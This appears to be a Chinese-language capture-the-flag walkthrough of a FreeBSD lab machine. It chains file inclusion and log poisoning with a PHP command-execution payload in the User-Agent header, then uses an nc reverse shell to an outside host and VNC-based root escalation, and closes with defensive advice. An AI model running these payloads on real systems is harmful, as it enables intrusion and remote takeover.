Meachines靶机渗透测试教学：LFI+日志投毒+VNC权限提升<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行端口扫描：<\/p>
nmap -p- 10.10.10.84 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

开放端口：

22\/tcp: OpenSSH 7.2 (FreeBSD)<\/li>
80\/tcp: Apache httpd 2.4.29 (FreeBSD) PHP\/5.6.32<\/li>
<\/ul>
<\/li>
<\/ul>
1.2 服务识别<\/h3>

操作系统：FreeBSD<\/li>
Web服务器：Apache 2.4.29<\/li>
PHP版本：5.6.32<\/li>
<\/ul>
2. Web应用漏洞利用<\/h2>
2.1 本地文件包含(LFI)漏洞<\/h3>
发现browse.php<\/code>存在文件包含漏洞：<\/p>
http:\/\/10.10.10.84\/browse.php?file=\/etc\/passwd
<\/span><\/span><\/span><\/code><\/pre>2.2 日志投毒攻击<\/h3>
2.2.1 投毒HTTP访问日志<\/h4>
构造恶意User-Agent头：<\/p>
GET<\/span> \/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 10.10.10.84<\/span>
<\/span><\/span>User-Agent:<\/span> <?php system($_GET['cmd']); phpinfo(); ?><\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<\/span>
<\/span><\/span>Accept-Language:<\/span> en-US,en;q=0.5<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate, br<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>Upgrade-Insecure-Requests:<\/span> 1<\/span>
<\/span><\/span><\/code><\/pre>2.2.2 利用投毒的日志执行命令<\/h4>
通过LFI包含日志文件并执行命令：<\/p>
http:\/\/10.10.10.84\/browse.php?1=ls%20-la&file=\/var\/log\/httpd-access.log
<\/span><\/span><\/span><\/code><\/pre>2.2.3 获取反向Shell<\/h4>
使用curl发送反向Shell命令：<\/p>
curl 'http:\/\/10.10.10.84\/browse.php?1=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.16.24%2010032%20%3E%2Ftmp%2Ff&file=\/var\/log\/httpd-access.log'<\/span>
<\/span><\/span><\/code><\/pre>3. 权限提升<\/h2>
3.1 获取用户凭据<\/h3>
发现密码备份文件pwdbackup.txt<\/code>，使用多次base64解码：<\/p>
data=<\/span>$(<\/span>cat data)<\/span>; for<\/span> i in $(<\/span>seq 1<\/span> 13)<\/span>; do<\/span> data=<\/span>$(<\/span>echo $data | tr -d ' '<\/span> | base64 -d)<\/span>; done<\/span>; echo $data
<\/span><\/span><\/code><\/pre>得到密码：Charix!2#4%6&8(0<\/code><\/p>
3.2 切换到charix用户<\/h3>
su charix
<\/span><\/span># 或通过SSH<\/span>
<\/span><\/span>ssh charix@10.10.10.84
<\/span><\/span><\/code><\/pre>获取user flag：<\/p>
eaacdfb2d141b72a589233063604209c
<\/code><\/pre>
3.3 发现VNC服务<\/h3>
检查网络连接和进程：<\/p>
netstat -an -p tcp
<\/span><\/span>ps -auwwx | grep vnc
<\/span><\/span><\/code><\/pre>发现VNC服务运行在5901端口，且以root权限运行：<\/p>
Xvnc :1 -desktop X -httpd \/usr\/local\/share\/tightvnc\/classes -auth \/root\/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth \/root\/.vnc\/passwd -rfbport 5901 -localhost -nolisten tcp :1
<\/code><\/pre>
3.4 获取VNC密码文件<\/h3>
从目标系统下载secret.zip：<\/p>
scp charix@10.10.10.84:\/home\/charix\/secret.zip .
<\/span><\/span><\/code><\/pre>解压密码：Charix!2#4%6&8(0)<\/code><\/p>
3.5 建立SSH隧道连接VNC<\/h3>
ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84
<\/span><\/span><\/code><\/pre>3.6 使用VNC客户端连接<\/h3>
vncviewer 127.0.0.1:5901 -passwd secret
<\/span><\/span><\/code><\/pre>3.7 获取root flag<\/h3>
716d04b188419cf2bb99d891272361f5
<\/code><\/pre>
4. 关键知识点总结<\/h2>


LFI漏洞利用<\/strong>：<\/p>

通过文件包含参数读取系统敏感文件<\/li>
结合日志文件实现RCE<\/li>
<\/ul>
<\/li>

日志投毒技术<\/strong>：<\/p>

通过修改HTTP头注入恶意代码<\/li>
利用服务器记录日志的特性执行代码<\/li>
<\/ul>
<\/li>

VNC权限提升<\/strong>：<\/p>

识别以root权限运行的VNC服务<\/li>
通过SSH隧道绕过本地限制<\/li>
使用获取的密码文件进行认证<\/li>
<\/ul>
<\/li>

密码破解技巧<\/strong>：<\/p>

多次base64解码隐藏的密码<\/li>
密码重用分析<\/li>
<\/ul>
<\/li>

FreeBSD系统特性<\/strong>：<\/p>

进程查看命令差异(ps -auwwx)<\/li>
网络连接查看命令(netstat -an -p tcp)<\/li>
<\/ul>
<\/li>
<\/ol>
5. 防御建议<\/h2>


修复LFI漏洞：<\/p>

对文件包含参数进行严格过滤<\/li>
禁用危险的PHP函数<\/li>
<\/ul>
<\/li>

日志安全：<\/p>

将日志文件存放在web目录外<\/li>
对日志文件设置严格权限<\/li>
<\/ul>
<\/li>

VNC服务安全：<\/p>

避免以root权限运行VNC<\/li>
使用更安全的认证方式<\/li>
限制VNC访问来源<\/li>
<\/ul>
<\/li>

密码管理：<\/p>

避免明文或简单编码存储密码<\/li>
实施密码复杂度要求<\/li>
避免密码重用<\/li>
<\/ul>
<\/li>
<\/ol>